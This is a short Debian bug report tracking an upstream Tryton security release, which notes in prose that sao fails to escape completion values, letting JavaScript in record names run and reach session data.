Source: tryton-sao Version: 7.0.38+ds1-1 Severity: important Tags: security upstream Forwarded: https://foss.heptapod.net/tryton/tryton/-/issues/14363 X-Debbugs-Cc: [email protected], Debian Security Team <[email protected]>
Hi Adding a tracking bug for https://discuss.tryton.org/t/security-release-for-issue-14363/8951 | Abdulfatah Abdillahi has found that sao does not escape the | completion values. The content of completion is generally the record | name which may be edited in many ways depending on the model. The | content may include some JavaScript which is executed in the same | context as sao which gives access to sensitive data such as the | session. https://foss.heptapod.net/tryton/tryton/-/issues/14363 Regards, Salvatore
